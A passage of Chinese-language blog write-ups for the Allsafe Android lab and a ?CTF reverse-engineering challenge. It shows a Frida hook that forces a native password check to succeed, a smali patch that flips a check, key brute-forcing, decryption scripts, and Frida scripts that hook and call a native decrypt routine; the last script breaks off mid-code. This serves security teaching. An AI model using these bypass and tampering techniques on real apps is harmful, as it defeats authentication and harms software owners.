"_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6assignEPKw", "_ZTSPd", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6assignEPKcm", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm", "_ZTSPDs", "_ZTIN10__cxxabiv120__si_class_type_infoE", "_ZTSPf", "_ZnwmSt11align_val_tRKSt9nothrow_t", "_ZTSs", "_ZTSPg", "_ZTSPDu", "_ZNSt15underflow_errorD1Ev", "_ZTSSt10bad_typeid", "_ZNSt6__ndk16stoullERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi", "_ZTSDn", "_ZTSPh", "_ZTSt", "_ZTVSt9exception", "__cxa_current_primary_exception", "_ZTSPi", "_ZTSv", "_ZTSPj", "_ZNSt13runtime_errorD0Ev", "_ZdaPvSt11align_val_t", "_ZTSw", "_ZTSN10__cxxabiv117__class_type_infoE", "_ZTSPl", "_ZTSx", "_ZTVN10__cxxabiv117__array_type_infoE", "_ZTISt15underflow_error", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6insertEmmc", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSERKS5_", "_ZTSPm", "_ZTSy", "_ZTSDs", "_ZnamRKSt9nothrow_t", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE7replaceEmmmw", "__cxa_allocate_dependent_exception", "_ZTSPn", "_ZNKSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE12find_last_ofEPKwmm", "__cxa_increment_exception_refcount", "_ZTSPo", "_ZTSDu", "_ZN7_JNIEnv20GetByteArrayElementsEP11_jbyteArrayPh", "_ZNKSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE13find_first_ofEPKcmm", "_ZNSt6__ndk14stofERKNS_12basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEEEPm", "__cxa_decrement_exception_refcount", "_ZNSt10bad_typeidC1Ev", "_ZTVN10__cxxabiv123__fundamental_type_infoE", "_ZTSPs", "_ZSt9terminatev", "_ZdlPvm", "_ZTSN10__cxxabiv123__fundamental_type_infoE", "_ZTSPt", "_ZNSt6__ndk112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendERKS5_mm", "_ZNSt6__ndk112basic_stringIwNS_11char_traitsIwEENS_9allocatorIwEEE6resizeEmw", "__cxa_allocate_exception", "_ZNSt6__ndk15stollERKNS_12basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEEPmi", "_ZTSPv", "_ZTVSt14overflow_error" ] </code></pre> <p>找check_password的地址一会hook,让我们无论输入什么,都能通过密码验证</p> <pre><code>[Android Emulator 5554::Allsafe ]-&gt; Process.getModuleByName("libnative_library.so").getExportByName("Java_infosecadvent ures_allsafe_challenges_NativeLibrary_checkPassword") "0x7638795a4430" </code></pre> <p>现在把地址赋给一个变量,一会使用 Interceptor 来钩住该函数,并劫持其实现,使其对提供的任何密码都返回 true。<a href="https://frida.re/docs/javascript-api/#interceptor">https://frida.re/docs/javascript-api/#interceptor</a></p> <pre><code>[Android Emulator 5554::Allsafe ]-&gt; var addr = Process.getModuleByName("libnative_library.so").getExportByName("Java_in fosecadventures_allsafe_challenges_NativeLibrary_checkPassword"); [Android Emulator 5554::Allsafe ]-&gt; console.log("[addr] " + addr); [addr] 0x7638795a4430 [Android Emulator 5554::Allsafe ]-&gt; Interceptor.attach(addr, { onEnter(args) { console.log("[*] checkPassword called"); }, onLeave(retval) { console.log("[*] original retval =", retval.toInt32()); retval.replace(1); console.log("[+] forced success"); } }); {} [Android Emulator 5554::Allsafe ]-&gt; [*] checkPassword called [*] original retval = 0 [+] forced success </code></pre> <p>随便输入都能通过验证,当然你也可以用apktool拿到so文件,然后IDA分析,发现密码就静态编译在里面,这里只是用frida来展示hook</p> <p>&lt;!-- 这是一张图片,ocr 内容为:THERE'S A NATIVE LIBRARY COMPILED WITH THE APPLICATION THAT IS USED TO VALIDATE THE PASSU HE PASSWORD BELOW. BY REVERSE ENGINEERING THE THE PASSWORD CHECK. ENTER PASSWORD I [CHECK] 确定 THAT'S IT!EXCELLENT WORK! --&gt; <img src="./images/img-45.png" alt="Figure 45" /></p> <h1>&lt;font style="color:rgb(36, 36, 36);"&gt;Smali Patch&lt;/font&gt;</h1> <p>这一关就是改smail代码,实现点击输出Firewall is now activated, good job!</p> <p>&lt;!-- 这是一张图片,ocr 内容为:* JADX INFO: ACCESS MODIFIERS CHANGED FROM: PRIVATE */ PUBLIC /大 SYNTHETIC */ VOID LAMBDASONCREATEVIEWSO(FIREWALL FIREWALL, VIEW V) IF (FIREWALL.EQUALS(FIREWALL.ACTIVE)){ SNACKUTIL.INSTANCE.SINDLEHESSAGE(REQUIREACTIVITYO, "FIREWALL IS NOW ACTIVATED, 9OOD, 900D JOB: TOAST.MAKETEXT(REQUIRECONTEXTO,"G00D J08!",1).SHOWO; ELSET SNACKUTIL.INSTAHCE.SIMPLEKESSAGE(REQUIREACTIVITYO, "FIREWALL IS DOWN, TRY HARDER!"); --&gt; <img src="./images/img-46.png" alt="Figure 46" /></p> <p>这里我直接用MT管理器打开演示一下</p> <p>在class4.dex里</p> <p>&lt;!-- 这是一张图片,ocr 内容为:MOVE-RESULT VO IF-EQZ VO, :COND_22 .LINE 24 SGET OBJECT VO, UNFOSECADVENTURES/ALLSAFE/UTILS/SNACKUTIL: INVOKEVITUAL ( (OO), UNFOSECADVES/ALLSAFE/CHALENGES/SMAIPATCH;&gt;REQUIEACTIVIYOLANDROIDX FREGMENTACTIVI MOVE-RESULT-OBJECT V1 CONST-STRING V2,"FIREWALL IS NOW ACTIVATED,GOOD JOB! LUD83D\UDC4D" --&gt; <img src="./images/img-47.png" alt="Figure 47" /></p> <p>修改为</p> <p>&lt;!-- 这是一张图片,ocr 内容为:IF-NEZ VO, COND_22 .LINE 24 SGER OBJECT VO,UNFOSECADVENTURES/ALLSAFE/UTIS/SNACKUTIL;&gt;INSTANCELINFOSECADVENTURES/ALLSAFE/UTIS/SNAC INVOKEVIRTUA[ 1PO; UNFOSECADVENTURESSFERCHALENGES/SNALPATCH--REQUREQUREACIVITYOLDX/TREGNENT/FRAGNTACI MOVE-RESULT-OBJECT V1 --&gt; <img src="./images/img-48.png" alt="Figure 48" /></p> <p>成功</p> <p>&lt;!-- 这是一张图片,ocr 内容为:[CHECK FIREWALL] GOOD JOB! 确定 FIREWALL IS NOW JOB! --&gt; <img src="./images/img-49.png" alt="Figure 49" /></p> ?CTFhttps://blog-5w0.pages.dev/posts/question-ctf/https://blog-5w0.pages.dev/posts/question-ctf/?CTF Reverse WriteUpFri, 05 Sep 2025 00:00:00 GMT<h2>Week 4</h2> <h1>1.SMC</h1> <p>main函数,让我们输入一个四字节的key,flag的长度是32</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-001.png" alt="" /></p> <p>正确的key是‘LYLY’,这个函数的计算结果要等于0x7B3126E5h,算法实现在sub_1400011C0函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-002.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-003.png" alt="" /></p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-004.png" alt="" /></p> <p>爆破脚本</p> <pre><code>#include &lt;iostream&gt; #include &lt;Windows.h&gt; __int64 __fastcall fnv(byte *a1, unsigned __int64 a2, unsigned int a3, int a4) { unsigned __int64 i; for (i = 0; i &lt; a2; ++i) a3 = a4 * (a1[i] ^ a3); return a3; } int main() { DWORD Key{}; for (Key = 0; Key &lt; 0xffffffff; Key++) { if (fnv((byte*)(&amp;Key), 4, 0x811C9235LL, 0x1000193) == 0x7B3126E5) { printf("Key: %.4s\n", (char *)(&amp;Key)); break; } } return 0; } </code></pre> <p>sub_140001540是对加密函数进行保护的函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-005.png" alt="" /></p> <p>我们看不到正确的加密算法</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-006.png" alt="" /></p> <p>我们动调,执行过保护函数,可以看到</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-007.png" alt="" /></p> <p>然后按c转化为汇编</p> <pre><code>text:00007FF778F01240 ; __unwind { // __GSHandlerCheck .text:00007FF778F01240 loc_7FF778F01240 db 48h ; H ; CODE XREF: main+CE↓p .text:00007FF778F01240 ; DATA XREF: sub_7FF778F01540+39↓o ... .text:00007FF778F01242 push rsp .text:00007FF778F01243 and al, 10h .text:00007FF778F01245 mov [rsp+8], rcx .text:00007FF778F0124A push rdi .text:00007FF778F0124B sub rsp, 250h .text:00007FF778F01252 mov rax, cs:__security_cookie .text:00007FF778F01259 xor rax, rsp .text:00007FF778F0125C mov [rsp+240h], rax .text:00007FF778F01264 lea rax, [rsp+40h] .text:00007FF778F01269 mov rdi, rax .text:00007FF778F0126C xor eax, eax .text:00007FF778F0126E mov ecx, 100h .text:00007FF778F01273 rep stosb .text:00007FF778F01275 mov dword ptr [rsp+10h], 0 .text:00007FF778F0127D jmp short loc_7FF778F01289 .text:00007FF778F0127F ; --------------------------------------------------------------------------- .text:00007FF778F0127F .text:00007FF778F0127F loc_7FF778F0127F: ; CODE XREF: .text:00007FF778F012A0↓j .text:00007FF778F0127F mov eax, [rsp+10h] .text:00007FF778F01283 inc eax .text:00007FF778F01285 mov [rsp+10h], eax .text:00007FF778F01289 .text:00007FF778F01289 loc_7FF778F01289: ; CODE XREF: .text:00007FF778F0127D↑j .text:00007FF778F01289 cmp dword ptr [rsp+10h], 100h .text:00007FF778F01291 jnb short loc_7FF778F012A2 .text:00007FF778F01293 mov eax, [rsp+10h] .text:00007FF778F01297 movzx ecx, byte ptr [rsp+10h] .text:00007FF778F0129C mov [rsp+rax+40h], cl .text:00007FF778F012A0 jmp short loc_7FF778F0127F .text:00007FF778F012A2 ; --------------------------------------------------------------------------- .text:00007FF778F012A2 .text:00007FF778F012A2 loc_7FF778F012A2: ; CODE XREF: .text:00007FF778F01291↑j .text:00007FF778F012A2 mov dword ptr [rsp+30h], 4 .text:00007FF778F012AA lea rax, [rsp+140h] .text:00007FF778F012B2 mov rdi, rax .text:00007FF778F012B5 xor eax, eax .text:00007FF778F012B7 mov ecx, 100h .text:00007FF778F012BC rep stosb .text:00007FF778F012BE mov dword ptr [rsp+14h], 0 .text:00007FF778F012C6 jmp short loc_7FF778F012D2 .text:00007FF778F012C8 ; --------------------------------------------------------------------------- .text:00007FF778F012C8 .text:00007FF778F012C8 loc_7FF778F012C8: ; CODE XREF: .text:00007FF778F01305↓j .text:00007FF778F012C8 mov eax, [rsp+14h] .text:00007FF778F012CC inc eax .text:00007FF778F012CE mov [rsp+14h], eax .text:00007FF778F012D2 .text:00007FF778F012D2 loc_7FF778F012D2: ; CODE XREF: .text:00007FF778F012C6↑j .text:00007FF778F012D2 cmp dword ptr [rsp+14h], 100h .text:00007FF778F012DA jge short loc_7FF778F01307 .text:00007FF778F012DC xor edx, edx .text:00007FF778F012DE mov eax, [rsp+14h] .text:00007FF778F012E2 div dword ptr [rsp+30h] .text:00007FF778F012E6 mov eax, edx .text:00007FF778F012E8 mov eax, eax .text:00007FF778F012EA mov rcx, [rsp+268h] .text:00007FF778F012F2 movzx eax, byte ptr [rcx+rax] .text:00007FF778F012F6 xor eax, 11h .text:00007FF778F012F9 movsxd rcx, dword ptr [rsp+14h] .text:00007FF778F012FE mov [rsp+rcx+140h], al .text:00007FF778F01305 jmp short loc_7FF778F012C8 .text:00007FF778F01307 ; --------------------------------------------------------------------------- .text:00007FF778F01307 .text:00007FF778F01307 loc_7FF778F01307: ; CODE XREF: .text:00007FF778F012DA↑j .text:00007FF778F01307 mov dword ptr [rsp+1Ch], 0 .text:00007FF778F0130F mov dword ptr [rsp+8], 0 .text:00007FF778F01317 jmp short loc_7FF778F01323 .text:00007FF778F01319 ; --------------------------------------------------------------------------- .text:00007FF778F01319 .text:00007FF778F01319 loc_7FF778F01319: ; CODE XREF: .text:00007FF778F01391↓j .text:00007FF778F01319 mov eax, [rsp+8] .text:00007FF778F0131D inc eax .text:00007FF778F0131F mov [rsp+8], eax .text:00007FF778F01323 .text:00007FF778F01323 loc_7FF778F01323: ; CODE XREF: .text:00007FF778F01317↑j .text:00007FF778F01323 cmp dword ptr [rsp+8], 100h .text:00007FF778F0132B jge short loc_7FF778F01393 .text:00007FF778F0132D movsxd rax, dword ptr [rsp+8] .text:00007FF778F01332 movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F01337 mov ecx, [rsp+1Ch] .text:00007FF778F0133B add ecx, eax .text:00007FF778F0133D mov eax, ecx .text:00007FF778F0133F movsxd rcx, dword ptr [rsp+8] .text:00007FF778F01344 movzx ecx, byte ptr [rsp+rcx+140h] .text:00007FF778F0134C add eax, ecx .text:00007FF778F0134E cdq .text:00007FF778F0134F and edx, 0FFh .text:00007FF778F01355 add eax, edx .text:00007FF778F01357 and eax, 0FFh .text:00007FF778F0135C sub eax, edx .text:00007FF778F0135E mov [rsp+1Ch], eax .text:00007FF778F01362 movsxd rax, dword ptr [rsp+8] .text:00007FF778F01367 movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F0136C mov [rsp+2], al .text:00007FF778F01370 movsxd rax, dword ptr [rsp+1Ch] .text:00007FF778F01375 movsxd rcx, dword ptr [rsp+8] .text:00007FF778F0137A movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F0137F mov [rsp+rcx+40h], al .text:00007FF778F01383 movsxd rax, dword ptr [rsp+1Ch] .text:00007FF778F01388 movzx ecx, byte ptr [rsp+2] .text:00007FF778F0138D mov [rsp+rax+40h], cl .text:00007FF778F01391 jmp short loc_7FF778F01319 .text:00007FF778F01393 ; --------------------------------------------------------------------------- .text:00007FF778F01393 .text:00007FF778F01393 loc_7FF778F01393: ; CODE XREF: .text:00007FF778F0132B↑j .text:00007FF778F01393 mov byte ptr [rsp], 0 .text:00007FF778F01397 mov byte ptr [rsp+1], 0 .text:00007FF778F0139C mov rax, [rsp+260h] .text:00007FF778F013A4 mov [rsp+38h], rax .text:00007FF778F013A9 mov qword ptr [rsp+28h], 0FFFFFFFFFFFFFFFFh .text:00007FF778F013B2 .text:00007FF778F013B2 loc_7FF778F013B2: ; CODE XREF: .text:00007FF778F013C5↓j .text:00007FF778F013B2 inc qword ptr [rsp+28h] .text:00007FF778F013B7 mov rax, [rsp+38h] .text:00007FF778F013BC mov rcx, [rsp+28h] .text:00007FF778F013C1 cmp byte ptr [rax+rcx], 0 .text:00007FF778F013C5 jnz short loc_7FF778F013B2 .text:00007FF778F013C7 mov rax, [rsp+28h] .text:00007FF778F013CC mov [rsp+20h], eax .text:00007FF778F013D0 mov dword ptr [rsp+18h], 0 .text:00007FF778F013D8 jmp short loc_7FF778F013E4 .text:00007FF778F013DA ; --------------------------------------------------------------------------- .text:00007FF778F013DA .text:00007FF778F013DA loc_7FF778F013DA: ; CODE XREF: .text:00007FF778F014B9↓j .text:00007FF778F013DA mov eax, [rsp+18h] .text:00007FF778F013DE inc eax .text:00007FF778F013E0 mov [rsp+18h], eax .text:00007FF778F013E4 .text:00007FF778F013E4 loc_7FF778F013E4: ; CODE XREF: .text:00007FF778F013D8↑j .text:00007FF778F013E4 mov eax, [rsp+20h] .text:00007FF778F013E8 cmp [rsp+18h], eax .text:00007FF778F013EC jnb loc_7FF778F014BE .text:00007FF778F013F2 movzx eax, byte ptr [rsp] .text:00007FF778F013F6 inc eax .text:00007FF778F013F8 cdq .text:00007FF778F013F9 and edx, 0FFh .text:00007FF778F013FF add eax, edx .text:00007FF778F01401 and eax, 0FFh .text:00007FF778F01406 sub eax, edx .text:00007FF778F01408 mov [rsp], al .text:00007FF778F0140B movzx eax, byte ptr [rsp+1] .text:00007FF778F01410 movzx ecx, byte ptr [rsp] .text:00007FF778F01414 movzx ecx, byte ptr [rsp+rcx+40h] .text:00007FF778F01419 add eax, ecx .text:00007FF778F0141B cdq .text:00007FF778F0141C and edx, 0FFh .text:00007FF778F01422 add eax, edx .text:00007FF778F01424 and eax, 0FFh .text:00007FF778F01429 sub eax, edx .text:00007FF778F0142B mov [rsp+1], al .text:00007FF778F0142F movzx eax, byte ptr [rsp] .text:00007FF778F01433 movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F01438 mov [rsp+3], al .text:00007FF778F0143C movzx eax, byte ptr [rsp+1] .text:00007FF778F01441 movzx ecx, byte ptr [rsp] .text:00007FF778F01445 movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F0144A mov [rsp+rcx+40h], al .text:00007FF778F0144E movzx eax, byte ptr [rsp+1] .text:00007FF778F01453 movzx ecx, byte ptr [rsp+3] .text:00007FF778F01458 mov [rsp+rax+40h], cl .text:00007FF778F0145C movzx eax, byte ptr [rsp] .text:00007FF778F01460 movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F01465 movzx ecx, byte ptr [rsp+1] .text:00007FF778F0146A movzx ecx, byte ptr [rsp+rcx+40h] .text:00007FF778F0146F add eax, ecx .text:00007FF778F01471 cdq .text:00007FF778F01472 and edx, 0FFh .text:00007FF778F01478 add eax, edx .text:00007FF778F0147A and eax, 0FFh .text:00007FF778F0147F sub eax, edx .text:00007FF778F01481 mov [rsp+4], al .text:00007FF778F01485 movzx eax, byte ptr [rsp+4] .text:00007FF778F0148A movzx eax, byte ptr [rsp+rax+40h] .text:00007FF778F0148F mov [rsp+5], al .text:00007FF778F01493 mov eax, [rsp+18h] .text:00007FF778F01497 movzx ecx, byte ptr [rsp+5] .text:00007FF778F0149C mov rdx, [rsp+260h] .text:00007FF778F014A4 movzx eax, byte ptr [rdx+rax] .text:00007FF778F014A8 xor eax, ecx .text:00007FF778F014AA mov ecx, [rsp+18h] .text:00007FF778F014AE mov rdx, [rsp+260h] .text:00007FF778F014B6 mov [rdx+rcx], al .text:00007FF778F014B9 jmp loc_7FF778F013DA .text:00007FF778F014BE ; --------------------------------------------------------------------------- .text:00007FF778F014BE .text:00007FF778F014BE loc_7FF778F014BE: ; CODE XREF: .text:00007FF778F013EC↑j .text:00007FF778F014BE mov dword ptr [rsp+0Ch], 0 .text:00007FF778F014C6 jmp short loc_7FF778F014D2 .text:00007FF778F014C8 ; --------------------------------------------------------------------------- .text:00007FF778F014C8 .text:00007FF778F014C8 loc_7FF778F014C8: ; CODE XREF: .text:loc_7FF778F0151B↓j .text:00007FF778F014C8 mov eax, [rsp+0Ch] .text:00007FF778F014CC inc eax .text:00007FF778F014CE mov [rsp+0Ch], eax .text:00007FF778F014D2 .text:00007FF778F014D2 loc_7FF778F014D2: ; CODE XREF: .text:00007FF778F014C6↑j .text:00007FF778F014D2 mov eax, [rsp+20h] .text:00007FF778F014D6 cmp [rsp+0Ch], eax .text:00007FF778F014DA jnb short loc_7FF778F0151D .text:00007FF778F014DC cmp dword ptr [rsp+0Ch], 0 .text:00007FF778F014E1 jz short loc_7FF778F0151B .text:00007FF778F014E3 movsxd rax, dword ptr [rsp+0Ch] .text:00007FF778F014E8 mov ecx, [rsp+0Ch] .text:00007FF778F014EC dec ecx .text:00007FF778F014EE movsxd rcx, ecx .text:00007FF778F014F1 mov rdx, [rsp+260h] .text:00007FF778F014F9 movzx ecx, byte ptr [rdx+rcx] .text:00007FF778F014FD mov rdx, [rsp+260h] .text:00007FF778F01505 movzx eax, byte ptr [rdx+rax] .text:00007FF778F01509 xor eax, ecx .text:00007FF778F0150B movsxd rcx, dword ptr [rsp+0Ch] .text:00007FF778F01510 mov rdx, [rsp+260h] .text:00007FF778F01518 mov [rdx+rcx], al .text:00007FF778F0151B .text:00007FF778F0151B loc_7FF778F0151B: ; CODE XREF: .text:00007FF778F014E1↑j .text:00007FF778F0151B jmp short loc_7FF778F014C8 .text:00007FF778F0151D ; --------------------------------------------------------------------------- .text:00007FF778F0151D .text:00007FF778F0151D loc_7FF778F0151D: ; CODE XREF: .text:00007FF778F014DA↑j .text:00007FF778F0151D mov rcx, [rsp+240h] .text:00007FF778F01525 xor rcx, rsp .text:00007FF778F01528 call __security_check_cookie .text:00007FF778F0152D add rsp, 250h .text:00007FF778F01534 pop rdi .text:00007FF778F01535 retn .text:00007FF778F01535 ; } // starts at 7FF778F01240 .text:00007FF778F01535 ; --------------------------------------------------------------------------- .text:00007FF778F01536 algn_7FF778F01536: ; DATA XREF: .pdata:00007FF778F0503C↓o .text:00007FF778F01536 align 20h </code></pre> <p>算法分析</p> <p>密文</p> <pre><code>data:00007FF778F04078 asc_7FF778F04078 db 86h,8Bh,82h,0DCh,31h,'a',10h,'Sk',17h,13h,'[w',19h,84h,0B1h,0E5h,2Ch,0EAh .data:00007FF778F04078 ; DATA XREF: main+DA↑o .data:00007FF778F0408B db 97h,0D8h,0C1h,0C4h,0F4h,'*',0E6h,8Bh,0D9h,17h,')',0D3h,30h </code></pre> <p>解密脚本</p> <pre><code>def reverse_smc_algorithm(key, encrypted_data): key_bytes = key.encode('ascii') if len(key_bytes) != 4: raise ValueError("密钥必须是4字节") encrypted_bytes = encrypted_data temp_data = list(encrypted_bytes) for i in range(len(temp_data) - 1, 0, -1): temp_data[i] = temp_data[i] ^ temp_data[i-1] s_box = list(range(256)) processed_key = [] for i in range(256): processed_key.append((key_bytes[i % 4] ^ 0x11) &amp; 0xFF) j = 0 for i in range(256): j = (j + s_box[i] + processed_key[i]) &amp; 0xFF s_box[i], s_box[j] = s_box[j], s_box[i] i = j = 0 output = [] for byte_val in temp_data: i = (i + 1) &amp; 0xFF j = (j + s_box[i]) &amp; 0xFF s_box[i], s_box[j] = s_box[j], s_box[i] keystream_byte = s_box[(s_box[i] + s_box[j]) &amp; 0xFF] decrypted_byte = byte_val ^ keystream_byte output.append(decrypted_byte) return bytes(output) def solve(): key = "LYLY" target_data = bytes([0x86, 0x8B, 0x82, 0xDC, 0x31, 0x61, 0x10, 0x53, 0x6B, 0x17, 0x13, 0x5B, 0x77, 0x19, 0x84, 0xB1, 0xE5, 0x2C, 0xEA, 0x97, 0xD8, 0xC1, 0xC4, 0xF4, 0x2A, 0xE6, 0x8B, 0xD9, 0x17, 0x29, 0xD3, 0x30]) decrypted = reverse_smc_algorithm(key, target_data) flag = decrypted.decode('ascii', errors='ignore').rstrip('\x00') print(f"Flag: {flag}") return flag if __name__ == "__main__": solve() </code></pre> <p>flag{fnv_and_self_modified_code}</p> <h1>2.安卓题目</h1> <p>JADX打开第一段flag:flag0:0nc$3@te</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-008.png" alt="" /></p> <p>第二段flag在xml文件中看到_@c7iv17ys</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-009.png" alt="" /></p> <p>第三段flag在资源文件是一个图片文件,010打开看到 _@5S3$ts</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-010.png" alt="" /></p> <p>第四段flag在string.xml里 _5trin9</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-011.png" alt="" /></p> <p>第五段flag在LibSoLib.so文件flag4:_4oLi8</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-012.png" alt="" /></p> <p>第五段是password</p> <p>我们先按在com.huanghunr.androidchallenge.NativeLoader中看到的逻辑对assets/x86_64/libandroidchallenge.so.enc做解密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-013.png" alt="" /></p> <p>哈希验证</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-014.png" alt="" /></p> <p>在com.huanghunr.androidchallenge.MainActivityKt里我们看到username长度小于等于4,密码在8到32之间,我们得到用户名是R*ot,是通过对四字节爆破出来的</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-015.png" alt="" /></p> <p>我们这里也可以通过文件头来获取用户名,so文件开头四字节是0x7f,0x45,0x4c,0x46,我们在010中看到这个加密的文件开头是2D,6E,7E,31</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-016.png" alt="" /></p> <p>解用户名</p> <pre><code>with open("libandroidchallenge.so.enc", "rb") as f: data = f.read() with open("libandroidchallenge.so", "wb") as f: encheader = b"\x2D\x6e\x7E\x31" elfheader = b"\x7f\x45\x4c\x46" key = [] for i in range(len(encheader)): key.append((encheader[i] ^ elfheader[i]) - i) #反推用户名 print("key: ", bytes(key)) f.write(bytes([ data[i] ^ ((key[i % len(key)] + i) &amp; 0xff) for i in range(len(data)) ])) # 解密so文件 print("done") </code></pre> <p>解密出来的so文件用IDA打开主要就是两个函数verifyPassword和ivGen函数</p> <p>verifyPassword是pasword校验函数</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-017.png" alt="" /></p> <p>sub_26660函数是生成16字节的密钥,伪随机数的算法用的种子是0</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-018.png" alt="" /></p> <p>encrypt函数是AES加密结构,被魔改了</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-019.png" alt="" /></p> <p>我们也可以看Decrypt函数,通过frida调用这个函数来完成解密</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-020.png" alt="" /></p> <p>用frida来获取密钥,里面会一直尝试hook,因为加了try喝setInterval,需要输入正确的用户名</p> <pre><code>function hookenc(intervalId){ try { // 获取目标 so 模块(libandroidchallenge.so) var md = Process.getModuleByName("libandroidchallenge.so"); // 获取模块的基地址。 var mdBase = md.base; //目标加密函数的相对偏移地址(通过ida反汇编得到) // 这里 0x028018 是arm64架构下 Encrypt 函数的偏移;在x86_x64架构下是0x26FA0 var funcAddr = 0x028018; // 一旦成功找到模块,就清除定时器,避免重复 hook clearInterval(intervalId); // 使用 Interceptor.attach 在目标函数入口处挂钩 // 第一个参数是“目标函数的真实内存地址” Interceptor.attach(mdBase.add(funcAddr), { // onEnter:在目标函数刚进入时触发(可以获取参数) onEnter: function (args) { // 目标函数的第三个参数(args[2])是密钥的地址 // Frida 的 args 数组对应函数的参数列表: // args[0] → 第1个参数,args[1] → 第2个参数 . var keyAddr = args[2]; // 从密钥地址处读取16个字节内容(因为 key 是16字节) var key = keyAddr.readByteArray(16); //打印读取到的 key(会以十六进制 dump 的形式显示) console.log("key:\n", key); }, // onLeave:在目标函数**返回之后**触发 // 这里我们没有对返回值做处理,所以留空 onLeave: function (retval) { } }); } catch(e){ // 9. 如果在获取模块或 hook 过程中出错(比如so 还没加载),就打印错误信息 console.log(e); } } // 刚开始so没有加载,如果直接 hook 可能会报错“找不到模块”,每隔1秒检查一次,直到成功为止 const intervalId = setInterval(() =&gt; { hookenc(intervalId); }, 1000); </code></pre> <p>但是frida版本不能过高,会出现找不到模块,官方wp中用的是16.6.5版本,我用的是17.3.2版本,这里就不做演示</p> <p>&lt;!-- 这是一张图片,ocr 内容为: --&gt; <img src="./images/img-021.png" alt="" /></p> <p>得到的key</p> <pre><code>key: / 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF / 00000000 5b 34 07 0c 6e e7 9f d8 ab 2f a6 db 12 4f 10 f9 [4 .n..../ .O . </code></pre> <p>之后就是用一个定义的函数来调用so中解密函数</p> <pre><code>function callDecrypt(){ // 获取名为 "libandroidchallenge.so" 的模块(也就是目标 so 动态库) var md = Process.getModuleByName("libandroidchallenge.so"); //获取这个模块的基地址。so 文件加载到内存后,会有一个实际的起始地址,这就是 base var mdBase = md.base; // 获取模块的基地址 // 计算目标解密函数的实际地址: // 0x286F8 是arm64架构下解密函数相对偏移;在x86_x64下是0x275E0 // 使用 mdBase.add(偏移) 得到解密函数在内存中的真实地址 // 然后用 NativeFunction 创建一个可以直接调用的 JS 函数。 // 返回类型:'pointer'(指针) // 参数类型:['pointer', 'int', 'pointer'] → (输入数据指针, 输入长度, 密钥指针) var DecryptFunc = new NativeFunction(mdBase.add(0x286F8), 'pointer', ['pointer', 'int', 'pointer']); // 分配一块内存空间,用来存放要解密的密文数据(大小 100 字节,足够存32字节) var input = Memory.alloc(100); // 再分配一块内存空间,用来存放解密使用的 key(同样分配 100 字节) var key = Memory.alloc(100); // 定义密文数组(32 个字节): // 这些字节就是程序中实际被加密的数据 var inputBytes = [ 0xA8, 0xD1, 0xFE, 0xD6, 0x83, 0xE5, 0xD4, 0x5F, 0xA5, 0x96, 0x9C, 0xDA, 0xD3, 0x6D, 0x5B, 0x35, 0x60, 0x7C, 0x02, 0xE4, 0x92, 0x35, 0xF8, 0xA0, 0x3A, 0x9B, 0xBC, 0x48, 0xEC, 0x48, 0x24, 0xDE ]; // 密文的实际长度(这里是32字节) var inputlen = 32; // 定义密钥数组(16 个字节) var keyBytes = [ 0x5B, 0x34, 0x07, 0x0C, 0x6E, 0xE7, 0x9F, 0xD8, 0xAB, 0x2F, 0xA6, 0xDB, 0x12, 0x4F, 0x10, 0xF9 ]; // 将 keyBytes 逐字节写入到之前分配的 key 内存中 for (var i = 0; i &lt; 16; i++) { key.add(i).writeU8(keyBytes[i]); } // 将 inputBytes 逐字节写入到 input 内存中 for (var i = 0; i &lt; 32; i++) { input.add(i).writeU8(inputBytes[i]); } } // 调用解密函数,传入参数: // - input:密文数据的内存地址 // - inputlen:密文长度 // - key:密钥的内存地址 // // 解密函数执行后,返回值是一个指向解密结果的指针 var res = DecryptFunc(input, inputlen, key); // 